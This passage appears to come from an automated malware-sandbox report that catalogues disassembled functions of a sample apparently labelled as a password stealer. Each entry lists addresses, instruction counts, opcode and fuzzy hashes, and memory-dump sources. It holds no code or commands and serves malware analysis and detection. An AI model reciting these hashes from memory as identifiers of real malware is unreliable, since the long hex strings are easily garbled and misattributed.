                            • String ID:
                            • API String ID:
                            • Opcode ID: 985c37c4065799a4b3ac2e7b59f786f4f1189413a2d8c6cef2f048aeb9ea6a3b
                            • Instruction ID: 64d05f957144f4f9b314aa50fa198626c2db371d0359c456faf38e3fee22f323
                            • Opcode Fuzzy Hash: 985c37c4065799a4b3ac2e7b59f786f4f1189413a2d8c6cef2f048aeb9ea6a3b
                            • Instruction Fuzzy Hash: CB117CB16043049FC700DF69C44195BBBE4FF99710F00451FBA98D7360D630E900CB92
                            Function 0153CA11 Relevance: .0, Instructions: 48COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 19161f668b9ca1313c6c4e514890dd828b7ff5111e5ea8ea0c424e1fdff09f9a
                            • Instruction ID: f62b3ba45824066c696c32963aaf1d82a3b250e94d29ed537fe69de1ae8c4ea0
                            • Opcode Fuzzy Hash: 19161f668b9ca1313c6c4e514890dd828b7ff5111e5ea8ea0c424e1fdff09f9a
                            • Instruction Fuzzy Hash: F41179B16083089FC310DF6AC441A5BBBE4FF99750F00891FBA58DB3A0E670E901CB92
                            Function 014CE016 Relevance: .0, Instructions: 46COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                            • Instruction ID: d225c447e4e732da941ab3e68d3a9d845ed884de785dfce4346c436c9f977d92
                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                            • Instruction Fuzzy Hash: 3E017C762006909FE323865EC948F6B7BD8FB84B54F0904AAF909DB6E2D778DC41C661
                            Function 014A826B Relevance: .0, Instructions: 46COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6d9dbb835d46d64ce3abc84bab61cfe0ad7a7043f0e44b3efde8f484967ea318
                            • Instruction ID: 626b98902f0da175f484d07d844ad2a8ecbc81a4033c36fe2d6bb883fbc86f6d
                            • Opcode Fuzzy Hash: 6d9dbb835d46d64ce3abc84bab61cfe0ad7a7043f0e44b3efde8f484967ea318
                            • Instruction Fuzzy Hash: EF01AC32B00506DBD714EB69DC449BF77A9FFE0610B96406B99019B790DE70DD05C690
                            Function 0155EB50 Relevance: .0, Instructions: 46COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 2030a28ab613a796ba1df8e59f0aa2cb52236e8ff2ee0e4cd21276d173f0376d
                            • Instruction ID: ebc6bd389c83b9ad4488890c93ccf33d2d421c22c7f7f4cf78adc8dcff93dc6d
                            • Opcode Fuzzy Hash: 2030a28ab613a796ba1df8e59f0aa2cb52236e8ff2ee0e4cd21276d173f0376d
                            • Instruction Fuzzy Hash: 9E01D4716806019FD3715B16D802F16FAA8FF64B60F01082FA6059F3A0C6F099418B94
                            Function 014B2582 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 29ac6893e4b8f1c8b6c35b270f4e6ec1b606b62b8b8782bf10ddfcdd2f9f7e8e
                            • Instruction ID: 7b2c7f490caa7b1c384305bbe6612fe6c0406304ef81692a6aebdc12c43b04db
                            • Opcode Fuzzy Hash: 29ac6893e4b8f1c8b6c35b270f4e6ec1b606b62b8b8782bf10ddfcdd2f9f7e8e
                            • Instruction Fuzzy Hash: 5BF0F933741610BBC7319F578D80F4B7AADEB94F90F00402EE60597650C670ED01DAB0
                            Function 014DC073 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                            • Instruction ID: ec5b52c428682e86079021c2ecb59604e2b57a420f71c6f1a7e8292fa95b7aef
                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                            • Instruction Fuzzy Hash: 70F0AFF2600611ABD325CF8ED940E57FBEADBD1A90F04812DA605CB320EA31ED04CB90
                            Function 0158634F Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f4ef28503a95eed61dffbcc1fc42a6778f748af5b4dc5d15fd22b601a5288ad0
                            • Instruction ID: a6f4ee909f26b48fcbc463032327d3aae9bf3cfa03fe38d4a7dcefa665a77332
                            • Opcode Fuzzy Hash: f4ef28503a95eed61dffbcc1fc42a6778f748af5b4dc5d15fd22b601a5288ad0
                            • Instruction Fuzzy Hash: 25018F71A10209EFDB00DFAAD440AAEB7F8FF58300F10402EFA00EB350DA349A01CBA0
                            Function 014AC310 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                            • Instruction ID: 84b34972989f37255d172d723e254d14be0cbc27d5f44bdf11df8d178c5bddbe
                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                            • Instruction Fuzzy Hash: 70F021332046339FD772579E48C0B6BA5959FF5A64F9B003BF2059B360C9708D0257D0
                            Function 0158625D Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fb827024537ef3ad1564e9d518c4c36feb57da881b7ba6b25b1b4e2b88133a1e
                            • Instruction ID: 95801ae35a93d6dc6146e9d699eacd4c74ca4d3d507268708c726ab00bc1ac9b
                            • Opcode Fuzzy Hash: fb827024537ef3ad1564e9d518c4c36feb57da881b7ba6b25b1b4e2b88133a1e
                            • Instruction Fuzzy Hash: 93017171A00209EFDB04DFA9D441AAEB7F8FF58300F10405AF901EB350D6749901CBA0
                            Function 015862D6 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4746aed73eefcbbc976380cd48c6c656ca4e11eac2239b5061b8dfd3ab833f2e
                            • Instruction ID: 7385826691e7232370cf9e0389e06c6d898f7e7f36c63792804729575d8a4ec0
                            • Opcode Fuzzy Hash: 4746aed73eefcbbc976380cd48c6c656ca4e11eac2239b5061b8dfd3ab833f2e
                            • Instruction Fuzzy Hash: E2014471A00209EFDB04DFA9D441AAEB7F8FF58704F51405AFA14EB350DA749D01CBA4
                            Function 014ECA6F Relevance: .0, Instructions: 42COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                            • Instruction ID: cb2db47ab609a3fd8787f12548371d36283cc848365f61df88529c0e2758b676
                            • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                            • Instruction Fuzzy Hash: 3901F9322006959BE322D79DD849F5ABBD8FF52754F08446AFA048F7F1D679C801C250
                            Function 015861E5 Relevance: .0, Instructions: 41COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 39f3f4eea05c7a57ac071cf8f67af252f61cbe038f991614956aed8914526b7b
                            • Instruction ID: b74d51fbe971f0d21613c4611247a281be220684f83534a66bf1a426d6058f1f
                            • Opcode Fuzzy Hash: 39f3f4eea05c7a57ac071cf8f67af252f61cbe038f991614956aed8914526b7b
                            • Instruction Fuzzy Hash: DF012C71A002499BDB04DFA9D545AEEBBF8BF58710F15405EE501AB390D774AA01CB94
                            Function 015363C0 Relevance: .0, Instructions: 41COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                            • Instruction ID: c3d9f1085a85ee966cf12c343d9415793766b0bfe9edaf8cfc6bee7b8df3663e
                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                            • Instruction Fuzzy Hash: EFF01D7220001EBFEF019F95DD80DEF7B7EFB99698B114129FA1196160D631DE21ABA0
                            Function 0153A4B0 Relevance: .0, Instructions: 40COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ad2ae82d72078e986725848af7831692b4671ed0f242a5a02c34a614fc45f5a0
                            • Instruction ID: 0f64f4de55a31ae6608a12cb0c681d9a3ba87457377495654e087090fc52e80e
                            • Opcode Fuzzy Hash: ad2ae82d72078e986725848af7831692b4671ed0f242a5a02c34a614fc45f5a0
                            • Instruction Fuzzy Hash: 35019A36110219ABCF129F84DC40EDE3F66FB8C754F068105FE19AA260C332D970EB81
                            Function 014AC0F0 Relevance: .0, Instructions: 39COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ccef1700ef88d612eb8b594e004769cf0ff075c1c2f9bee86b65705cd5f7ff82
                            • Instruction ID: d3ac0413f69147f30b4c359dbf61fdb6fac956f8194a39c833f718d43dcb65f9
                            • Opcode Fuzzy Hash: ccef1700ef88d612eb8b594e004769cf0ff075c1c2f9bee86b65705cd5f7ff82
                            • Instruction Fuzzy Hash: 61F02B713043415BF791A6199C91F633695E7E0651FA6802BE7058F7F1EA70EC0187A4
                            Function 014E656A Relevance: .0, Instructions: 39COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5b9b81082da0ec4571e8d4c4de3f7bde3bb72b973ec8b77babf63835359a73d3
                            • Instruction ID: 1d51b3aa208e21e6138ec778d8e6d5eb06f9f57ecac4364a5fc9c127a9afece0
                            • Opcode Fuzzy Hash: 5b9b81082da0ec4571e8d4c4de3f7bde3bb72b973ec8b77babf63835359a73d3
                            • Instruction Fuzzy Hash: 3E01A4713406819BF3229B2CDD4CF6A3BE4BB61B00F4A45A5FA118F6F6D778D8428710
                            Function 0155437C Relevance: .0, Instructions: 37COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                            • Instruction ID: 25c62d06fbd35a42618cc7876f42ad9ac089c3c0cdda4396c7297ddd4da35069
                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                            • Instruction Fuzzy Hash: F7F0E93534191347EBB5AB2E8430B2EA695BFA0D50B17053F9D01CF671EF20D8C08780
                            Function 0153E872 Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                            • Instruction ID: f0c069cacb3d0a44f690639d6aabb158ad440797878cd8dd5087b48b8df839d6
                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                            • Instruction Fuzzy Hash: A1F05E33B116129BE3219E4ECC81F5AF7E8FFD5A60F190479AA04AF260C760EC0287D0
                            Function 0153C89D Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bd73b8f2b5dc463b285113ac6d326d78cda76836ee9fa9f15c81e8018bb89b98
                            • Instruction ID: 5c6a35c4ac667797120e1f0dcf48d7292e4f00547e472c4795c8cfbb747bb9c4
                            • Opcode Fuzzy Hash: bd73b8f2b5dc463b285113ac6d326d78cda76836ee9fa9f15c81e8018bb89b98
                            • Instruction Fuzzy Hash: E9F0AF716053449FC310EF29C441A2BB7E4FFA8710F404A5FB998DB394EA34EA01C796
                            Function 014E0854 Relevance: .0, Instructions: 35COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                            • Instruction ID: 531e9e65bbf29ab392893509ec4175f3d60376377f6ca969f4277b35fb6aef59
                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                            • Instruction Fuzzy Hash: 0EF0F072600201AEE314DB22CC04F46B6E9EFA8340F148079A584C72B0EAB0ED01C654
                            Function 0153C912 Relevance: .0, Instructions: 34COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 06d6a82499916a00bf4eff9d47410c63ca022a730f62cfd5f4f5e6aee605edc5
                            • Instruction ID: 7787f2b8f172e69bf0defefbfa153b3cf5fd2394a3fdb013432ed6f94eaf05e1
                            • Opcode Fuzzy Hash: 06d6a82499916a00bf4eff9d47410c63ca022a730f62cfd5f4f5e6aee605edc5
                            • Instruction Fuzzy Hash: DFF0C270A00249DFCB04EF69C511AAEB7F4FF68300F01805BB915EB395DA34EA01CB90
                            Function 014B47FB Relevance: .0, Instructions: 33COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 55fa585e24b655ad9ebc8045ba996a338b30f6b249ec626ea6ee5c543a72a960
                            • Instruction ID: a9178100a59bbcec488ad3ab709d370f022e074ba8b966de3b7fe6a1a71cd925
                            • Opcode Fuzzy Hash: 55fa585e24b655ad9ebc8045ba996a338b30f6b249ec626ea6ee5c543a72a960
                            • Instruction Fuzzy Hash: B8F096399156D19ED722975CC484B9277E4DB01B20F0C596BE58B87673C734D840C6A1
                            Function 01570115 Relevance: .0, Instructions: 32COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ef2f4680c1543f88b46d5cb4fc65ec93f35fee8db376f34f1265f21effca98b6
                            • Instruction ID: 43dc0f42d2a4d4c318999d01d562bee0a998a32efa6496df3c2ba8008f6f3071
                            • Opcode Fuzzy Hash: ef2f4680c1543f88b46d5cb4fc65ec93f35fee8db376f34f1265f21effca98b6
                            • Instruction Fuzzy Hash: 02F0277A4596C20ECB326B3C7C622E97BA8B792110F4E2445E4B15F249CB748487D360
                            Function 014EC5ED Relevance: .0, Instructions: 31COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 254b099ff3fb90ca845cab743db1ce698020a91f99569b52e6338d8b98531777
                            • Instruction ID: fae620401fc036c4b72b14fdf38a52d4d1565b6b360c8e53d21f1c6d26d29530
                            • Opcode Fuzzy Hash: 254b099ff3fb90ca845cab743db1ce698020a91f99569b52e6338d8b98531777
                            • Instruction Fuzzy Hash: 22F0E2715116519FE322973CC1CCB237BE4AB85BA2F089527D44E87672C374E882CE91
                            Function 014F2619 Relevance: .0, Instructions: 31COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                            • Instruction ID: 4f706c64647eea87f12b11df6253cde8b0f54c78bc794464f93836be49d871dc
                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                            • Instruction Fuzzy Hash: 46E092723006012BE7119E5A8C80F477B6EDFA6B10F04007EB6045E361C9F2DD0986A4
                            Function 01546030 Relevance: .0, Instructions: 29COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                            • Instruction ID: 9f532e2ab1a0233ee8c048801ecf74569055263c5041560518538b7d21b9b182
                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                            • Instruction Fuzzy Hash: 53F030722042049FE3218F0AD944F56B7F8FB16769F45C42AE6099F561D379EC40CFA4
                            Function 014B0710 Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                            • Instruction ID: e97dd21e21f21b3ecac7d16fe17ee97736fbf50f13ef1971edc4bd988b5c0716
                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                            • Instruction Fuzzy Hash: 7CF0E5392047419BEB16CF19C090AEABBF8FB51350F1404AAF8468B361D731E983CBA0
                            Function 014E49D0 Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                            • Instruction ID: ec7f7436a05f1a5581ce8527550e476935d76eda9582e18c6d00ce66c2e5c059
                            • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                            • Instruction Fuzzy Hash: 0DE0D832344145ABD3211A598808B6B77E6DBE07F2F19042FE200CB270DB70DC41C7D8
                            Function 01584164 Relevance: .0, Instructions: 27COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9e903a5ea344887834462e23a8939dd7e95778efe14bf661ffc3ae538c19abb2
                            • Instruction ID: bcb988ad7650dc4b74b067ecc7d9015776dc26d5581ffa195bb14aa12151fc21
                            • Opcode Fuzzy Hash: 9e903a5ea344887834462e23a8939dd7e95778efe14bf661ffc3ae538c19abb2
                            • Instruction Fuzzy Hash: 65F0E531A256938FE772F72CD140B5D7BE0BB10A30F4A0565D8409F912C724DC40C650
                            Function 0155678E Relevance: .0, Instructions: 27COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                            • Instruction ID: 58a1ef0ee828356f90ebafe76b6c57623e1f65e1b05dee9f63f6d8f3d9daf70d
                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                            • Instruction Fuzzy Hash: E7E0D832A00110BBEB6197598D15F9A7EACEBA0EA0F05015ABA00DB0A0D530DE00C690
                            Function 015808C0 Relevance: .0, Instructions: 25COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                            • Instruction ID: 2cae2d0688497b81dcb3493aa8eb4cf339b9496c874a03612bb7bf587708f3fd
                            • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                            • Instruction Fuzzy Hash: 02E09B316507508BCB25AA1DC540A57B7E8FFD5661F158069E9055B653C231F887CAD0
                            Function 014B25E0 Relevance: .0, Instructions: 23COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ad628e45fc258a1aed759b908ef867e96e58cfe725879c2ec4a5b5f6e601abfa
                            • Instruction ID: eef76b57d673f71ff00efb3c55c8cf238fd578f4a9d8c2e7b2f0181a88a705e5
                            • Opcode Fuzzy Hash: ad628e45fc258a1aed759b908ef867e96e58cfe725879c2ec4a5b5f6e601abfa
                            • Instruction Fuzzy Hash: 8BE092321005549BC721BF2ADD41FCA7B9AEB70760F05452EB116571A0CA70B910C794
                            Function 0156A456 Relevance: .0, Instructions: 23COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                            • Instruction ID: cfb727c6273ebf1db038fbf5e1d370cfe3b81c78e415c64c9a769a6c7de436fd
                            • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                            • Instruction Fuzzy Hash: 33E09231010612DFE7326F2BCC48B567AE4BFA0712F148C2EE196275B0C7B5D8C0CA80
                            Function 01534000 Relevance: .0, Instructions: 22COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
